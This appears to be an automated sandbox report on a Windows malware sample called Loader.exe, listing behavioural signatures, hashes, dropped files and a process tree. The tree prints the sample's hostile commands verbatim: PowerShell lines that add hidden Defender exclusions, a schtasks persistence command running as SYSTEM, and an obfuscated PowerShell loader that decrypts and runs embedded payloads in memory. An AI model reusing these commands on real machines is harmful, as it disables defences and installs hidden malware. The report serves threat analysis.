Analysis

Max time kernel: 119s
Max time network: 124s
Platform: windows7_x64
Resource: win7-20240221-en
Resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
Submitted: 04-04-2024 12:27
Static task: static1

Behavioral task: behavioral1
  Sample: Loader.exe
  Resource: win7-20240221-en

Behavioral task: behavioral2
  Sample: Loader.exe
  Resource: win10v2004-20240226-en

Behavioral task: behavioral3
  Sample: opengl32.dll
  Resource: win7-20240221-en

Behavioral task: behavioral4
  Sample: opengl32.dll
  Resource: win10v2004-20240226-en
General

Target: Loader.exe
Size: 69.9MB
MD5: 0e3f59387c131274d399813d1d95d80c
SHA1: f09cce4678a762cfe87dbc5c8b68f9a951afebb2
SHA256: 558be4bca2165d9e1335330cfacc0ff3c175ed21dfe17c7421b3b1bae6348a6a
SHA512: fc04a75b47d0780212971e7a1db91df5f4d98ed796379bea053fb2c2578b3de42a6da561ce1579479f6f5088a06ff32d6945ac5fe112a5ca236f5453c60e54e1
SSDEEP: 393216:S0tsUElbLI3r6B6Xlek/Kez3sFumIYUDfLFokwsWtjGHx:SEIHIjlek/KY4bIYU7/wsfx
Malware Config

Signatures

- Downloads MZ/PE file

- Executes dropped EXE (2 IoCs)
  Processes (pid, process): 696 driver1.exe; 1208

- Loads dropped DLL (2 IoCs)
  Processes (pid, process): 1932 Loader.exe; 1208

- Creates scheduled task(s) (1 TTPs, 1 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.

- Detects videocard installed (1 TTPs, 1 IoCs)
  Uses WMIC.exe to determine the installed video card.

- GoLang User-Agent (3 IoCs)
  Uses the default User-Agent string defined by the GoLang HTTP packages.
  Processes (description, flow, ioc):
    HTTP User-Agent header | flow 2 | Go-http-client/1.1
    HTTP User-Agent header | flow 3 | Go-http-client/1.1
    HTTP User-Agent header | flow 4 | Go-http-client/1.1

- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
  Processes (pid, process): 1708 powershell.exe

- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes (pid, process): 2700 powershell.exe; 2528 powershell.exe; 1708 powershell.exe

- Suspicious use of AdjustPrivilegeToken (43 IoCs)
  Processes (description, pid, process):
    WMIC.exe (PID 1940), each of the following tokens recorded twice: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
    powershell.exe (PID 2700): SeDebugPrivilege
    powershell.exe (PID 2528): SeDebugPrivilege
    powershell.exe (PID 1708): SeDebugPrivilege

- Suspicious use of WriteProcessMemory (31 IoCs)
  Processes (source pid, source process, target pid, target process, occurrences):
    1932 Loader.exe wrote to memory of 2732 cmd.exe (3)
    2732 cmd.exe wrote to memory of 1940 WMIC.exe (3)
    1932 Loader.exe wrote to memory of 2700 powershell.exe (3)
    1932 Loader.exe wrote to memory of 2528 powershell.exe (3)
    1932 Loader.exe wrote to memory of 696 driver1.exe (3)
    1932 Loader.exe wrote to memory of 2836 cmd.exe (3)
    2836 cmd.exe wrote to memory of 1768 cmd.exe (3)
    1768 cmd.exe wrote to memory of 1904 cmd.exe (3)
    1768 cmd.exe wrote to memory of 1708 powershell.exe (4)
    1932 Loader.exe wrote to memory of 1028 schtasks.exe (3)

- Uses Task Scheduler COM API (1 TTPs)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

C:\Users\Admin\AppData\Local\Temp\Loader.exe  (PID 1932, depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\cmd.exe  (PID 2732, depth 2)
    Command line: cmd /C "wmic path win32_VideoController get name"
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\Wbem\WMIC.exe  (PID 1940, depth 3)
      Command line: wmic path win32_VideoController get name
      - Detects videocard installed
      - Suspicious use of AdjustPrivilegeToken

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2700, depth 2)
    Command line: powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\""
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2528, depth 2)
    Command line: powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath \"C:\ProgramData\""
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\ProgramData\driver1.exe  (PID 696, depth 2)
    Command line: C:\ProgramData\driver1.exe
    - Executes dropped EXE

  C:\Windows\system32\cmd.exe  (PID 2836, depth 2)
    Command line: cmd /c C:\ProgramData\driver2.cmd
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\cmd.exe  (PID 1768, depth 3)
      Command line: C:\Windows\system32\cmd.exe /K C:\ProgramData\driver2.cmd
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\cmd.exe  (PID 1904, depth 4)
        Command line: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\ProgramData\driver2.cmd';$AqEi='CrsqtpesqtpatsqtpeDesqtpcrsqtpyptsqtposqtprsqtp'.Replace('sqtp', ''),'FrCJbRoCJbRmBaCJbRseCJbR64CJbRStCJbRriCJbRnCJbRgCJbR'.Replace('CJbR', ''),'InTTXMvokTTXMeTTXM'.Replace('TTXM', ''),'EnfaNStryfaNSPoifaNSnfaNStfaNS'.Replace('faNS', ''),'ChMkDfanMkDfgeMkDfExtMkDfensMkDfioMkDfnMkDf'.Replace('MkDf', ''),'LonQgGanQgGdnQgG'.Replace('nQgG', ''),'MbgpxaibgpxnMbgpxobgpxdulbgpxebgpx'.Replace('bgpx', ''),'REtcKeEtcKadLEtcKinEtcKesEtcK'.Replace('EtcK', ''),'ElzFDsemzFDsezFDsnzFDstAzFDstzFDs'.Replace('zFDs', ''),'CenWEopenWEyenWEToenWE'.Replace('enWE', ''),'GeEAEWtCuEAEWrrEAEWenEAEWtPEAEWroEAEWcEAEWeEAEWsEAEWsEAEW'.Replace('EAEW', ''),'SpOMiiliOMiitOMii'.Replace('OMii', ''),'TrNYnSanNYnSsNYnSfNYnSorNYnSmNYnSFNYnSinaNYnSlBlNYnSocNYnSkNYnS'.Replace('NYnS', ''),'DecKPNcocKPNmpcKPNrcKPNesscKPN'.Replace('cKPN', '');powershell -w hidden;function CpemN($DYVvD){$uCDxz=[System.Security.Cryptography.Aes]::Create();$uCDxz.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uCDxz.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uCDxz.Key=[System.Convert]::($AqEi[1])('hwWmx8yZnmhBXTUujLmUilT/inW7ASWUfza/yiGaTE0=');$uCDxz.IV=[System.Convert]::($AqEi[1])('1shh+Csacdi2MAxWoHL6Vw==');$WrKXJ=$uCDxz.($AqEi[0])();$lQEbS=$WrKXJ.($AqEi[12])($DYVvD,0,$DYVvD.Length);$WrKXJ.Dispose();$uCDxz.Dispose();$lQEbS;}function Vaeom($DYVvD){$ufaBC=New-Object System.IO.MemoryStream(,$DYVvD);$fvcwX=New-Object System.IO.MemoryStream;$KxhFO=New-Object System.IO.Compression.GZipStream($ufaBC,[IO.Compression.CompressionMode]::($AqEi[13]));$KxhFO.($AqEi[9])($fvcwX);$KxhFO.Dispose();$ufaBC.Dispose();$fvcwX.Dispose();$fvcwX.ToArray();}$oYEdq=[System.IO.File]::($AqEi[7])([Console]::Title);$sExPv=Vaeom (CpemN ([Convert]::($AqEi[1])([System.Linq.Enumerable]::($AqEi[8])($oYEdq, 5).Substring(2))));$uYvCe=Vaeom (CpemN ([Convert]::($AqEi[1])([System.Linq.Enumerable]::($AqEi[8])($oYEdq, 6).Substring(2))));[System.Reflection.Assembly]::($AqEi[5])([byte[]]$uYvCe).($AqEi[3]).($AqEi[2])($null,$null);[System.Reflection.Assembly]::($AqEi[5])([byte[]]$sExPv).($AqEi[3]).($AqEi[2])($null,$null); "
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 1708, depth 4)
        Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        - Suspicious behavior: CmdExeWriteProcessMemorySpam
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\schtasks.exe  (PID 1028, depth 2)
    Command line: schtasks /create /tn WinDriver /tr C:\ProgramData\Microsoft\WinDriver.cmd /sc onstart /ru SYSTEM
    - Creates scheduled task(s)
Network
MITRE ATT&CK Enterprise v15
Downloads

File 1 (name not shown in the report)
  Filesize: 7.2MB
  MD5: d14ef6e6b689c92514b92b7865f622c6
  SHA1: 03a0aaafd831d9c07784744e0358b83e506402ab
  SHA256: 2d68dffce5555c659fb1de2b4d1e28597667ddefd6c99844ee5a346adcf0d036
  SHA512: 87754c793b4abc0066588cf60cff7b763090e2680aa3bc889e9f36ecaee28f18ea0ab1bb37d7049781079197237d83bb0995b61caa87888df4556ae921973d0c

File 2: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 64a7059321c6889d4162230fc7417dee
  SHA1: 55ec49e0949eeee3e2f6ea055abcfd98cb460cae
  SHA256: 7ae8a07ee9681fa55c972c2bd9bdb7a4e488872ca46dbf9675e3b8a06336c583
  SHA512: fb8261312071b2c292bbb4ee97a8f86326997014071b5ab178e468221e4697e8b4e248e3735a617310db4964a37129cce298738f0b4f078deebffbd88e3c2cc7

File 3 (name not shown in the report)
  Filesize: 3.6MB
  MD5: eb93f3965887e8796917d34d40c0869d
  SHA1: 10976e4bc2a7d412550048c06def0b0ebba77eb6
  SHA256: 31d452a1ae5637cd3127e7a2e4e8de9771ea1d4e2fa34cddfdd9f90b73d098a5
  SHA512: b743c9ef3fe72f7e79c16929ee6d00cd4a0961309ea73f12b599bf5217b271bef61ac1981fed8a2b48187c5ad8ca18d572d7076d335f0440c52f77f47cd81281